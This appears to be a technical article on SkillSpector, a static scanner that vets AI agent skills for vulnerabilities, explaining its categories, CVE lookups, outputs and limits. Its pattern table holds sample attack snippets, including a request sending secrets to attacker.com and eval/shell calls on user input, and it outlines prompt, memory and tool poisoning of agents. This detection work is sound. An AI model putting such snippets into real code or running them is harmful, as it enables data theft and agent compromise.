SkillSpector: How NVIDIA Built a Security Scanner for AI Agent Skills

NVIDIA released SkillSpector to address a supply chain problem: 26.1% of AI agent skills contain vulnerabilities and 5.2% show likely malicious intent. Agent skills run with implicit trust in platforms like Claude Code, Codex CLI, and Gemini CLI. Before you install a skill that can read your filesystem, call APIs, or modify state, you need to know if it will exfiltrate data, inject prompts, or poison your agent’s memory.

SkillSpector is a static analysis pipeline with 64 vulnerability patterns across 16 categories. It scans Git repos, URLs, zip files, directories, or single files. The architecture uses a two-stage approach: fast static analysis for known patterns, then optional LLM semantic evaluation for ambiguous code.

Two-Stage Analysis Pipeline

The first stage is AST-based static analysis. SkillSpector parses Python code into an abstract syntax tree and matches against 64 hardcoded patterns. This catches:

Prompt injection: User input concatenated into system prompts without sanitization
Data exfiltration: HTTP requests to unexpected domains, file writes to unusual paths
Privilege escalation: Subprocess calls with shell=True, eval() on untrusted input
Tool poisoning: MCP tool definitions that override expected behavior
Memory poisoning: Direct manipulation of agent state or conversation history

The static pass runs in milliseconds. It produces findings with severity labels (critical, high, medium, low) and a 0-100 risk score.

The second stage is optional LLM semantic evaluation. When static analysis flags ambiguous code (for example, a subprocess call that might be safe depending on runtime context), SkillSpector can send the code snippet to an LLM with a prompt asking whether the pattern is exploitable. This adds latency but reduces false positives.

You control the trade-off. Run static-only for CI pipelines where speed matters. Add LLM evaluation for high-stakes installs where you need deeper reasoning.

Vulnerability Categories and Agent-Specific Risks

SkillSpector’s 16 categories map to attack vectors specific to agent ecosystems:

Category	Attack Vector	Example Pattern
Prompt injection	User input inserted into system prompt	`f"System: {user_input}"` without escaping
Data exfiltration	Sensitive data sent to external endpoint	`requests.post("http://attacker.com", data=secrets)`
Privilege escalation	Shell command execution with user input	`subprocess.run(user_cmd, shell=True)`
Supply chain	Dependency with known CVE	Package version matches OSV.dev vulnerability
Excessive agency	Skill requests more permissions than needed	MCP tool with `allow_all_domains=True`
Output handling	Unescaped output rendered as HTML/JS	`return f"<div>{user_data}</div>"`
System prompt leakage	Skill exposes internal instructions	`print(agent.system_prompt)`
Memory poisoning	Direct writes to conversation state	`agent.history.append(fake_message)`
Tool misuse	Skill calls tools outside declared scope	Filesystem skill making network requests
Rogue agent	Skill spawns unauthorized sub-agents	`Agent(tools=all_tools, user_input=untrusted)`
Trigger abuse	Skill activates on unexpected conditions	`if "password" in message: exfiltrate()`
Dangerous code (AST)	Eval, exec, compile on untrusted input	`eval(user_code)`
Taint tracking	Untrusted data flows to sensitive sink	User input reaches `os.system()` without validation
YARA signatures	Binary patterns indicating malware	Obfuscated shellcode in skill package
MCP least privilege	Tool grants excessive permissions	Tool allows arbitrary file writes
MCP tool poisoning	Tool definition overrides expected behavior	Redefined `read_file` that also writes

The MCP categories are specific to the Model Context Protocol, a standard for agent-tool communication. SkillSpector checks whether MCP tool definitions follow least privilege (only request necessary permissions) and whether they override expected tool behavior.

SC4 Component and Live CVE Lookups

The SC4 (Supply Chain Security Component) queries OSV.dev for real-time vulnerability data. When SkillSpector finds a dependency (parsed from requirements.txt, pyproject.toml, or package.json), SC4 sends the package name and version to OSV.dev’s API.

If OSV.dev returns a CVE, SkillSpector includes it in the report with severity, description, and remediation link. If the API is unreachable, SC4 falls back to an offline vulnerability database bundled with the tool. This ensures scans work in air-gapped environments or when OSV.dev is down.

The offline fallback is a JSON file updated weekly via CI. It contains high-severity CVEs for common agent dependencies (requests, aiohttp, langchain, openai SDK). The trade-off: offline mode misses zero-day vulnerabilities but guarantees scans complete.

Output Formats and Integration Points

SkillSpector outputs four formats:

Terminal: Human-readable summary with color-coded severity
JSON: Machine-readable for CI pipelines
Markdown: For GitHub PR comments or documentation
SARIF: Static Analysis Results Interchange Format for GitHub Code Scanning, GitLab SAST, and other security dashboards

The SARIF output is the integration point for existing security workflows. You can pipe SkillSpector results into the same dashboards that track Snyk, Semgrep, or CodeQL findings.

Example JSON output structure:

{
  "risk_score": 78,
  "severity": "high",
  "findings": [
    {
      "category": "prompt_injection",
      "severity": "critical",
      "file": "skill.py",
      "line": 42,
      "code": "prompt = f\"System: {user_input}\"",
      "description": "User input concatenated into system prompt without sanitization",
      "remediation": "Use parameterized prompts or escape user input"
    }
  ],
  "dependencies": [
    {
      "name": "requests",
      "version": "2.25.0",
      "vulnerabilities": [
        {
          "id": "CVE-2023-32681",
          "severity": "medium",
          "description": "Proxy-Authorization header leak",
          "url": "https://osv.dev/CVE-2023-32681"
        }
      ]
    }
  ]
}

Architecture and Extension Points

SkillSpector is built as a plugin pipeline. Each vulnerability category is a separate analyzer module. The core scanner orchestrates:

Input normalization: Clone Git repo, extract zip, or read local files
File discovery: Find Python files, SKILL.md manifests, dependency files
Static analysis: Run all analyzer modules in parallel
Dependency scanning: Query SC4 for CVE data
LLM evaluation (optional): Send flagged snippets to LLM for semantic check
Report generation: Aggregate findings, calculate risk score, format output

To add a new vulnerability pattern, you implement an analyzer class with a scan() method that returns a list of findings. The scanner automatically includes it in the pipeline.

The LLM evaluation stage uses a prompt template that describes the vulnerability category and asks whether the code is exploitable. You can swap the LLM provider (OpenAI, Anthropic, local Ollama) via environment variables.

Failure Modes and Limitations

SkillSpector has clear boundaries:

No runtime analysis: It cannot detect vulnerabilities that only appear at runtime (for example, a skill that behaves differently based on environment variables)
AST-only for Python: JavaScript, TypeScript, and other languages get basic pattern matching but no deep AST analysis
LLM evaluation is non-deterministic: The same code snippet may get different verdicts across runs
Obfuscation defeats static analysis: Base64-encoded payloads or dynamically constructed code paths are invisible to AST parsing
False positives on safe patterns: A subprocess call with hardcoded arguments may trigger a finding even though it is not exploitable

The tool is designed for pre-installation vetting, not continuous monitoring. Once a skill is installed, SkillSpector cannot detect if it phones home or modifies behavior based on external signals.

Technical Verdict

Use SkillSpector when:

You are vetting third-party agent skills before installation
You need a fast, automated check in CI pipelines
You want SARIF output for existing security dashboards
You are building an agent marketplace and need supply chain hygiene

Avoid or supplement when:

You need runtime monitoring of installed skills
The skill uses heavy obfuscation or dynamic code generation
You require formal verification or proof of safety
The skill is written in a language other than Python (limited support)

SkillSpector is a static filter, not a guarantee. It catches known bad patterns and common mistakes. Pair it with sandboxing (containers, VMs, capability-based security) and runtime monitoring (syscall tracing, network egress rules) for defense in depth.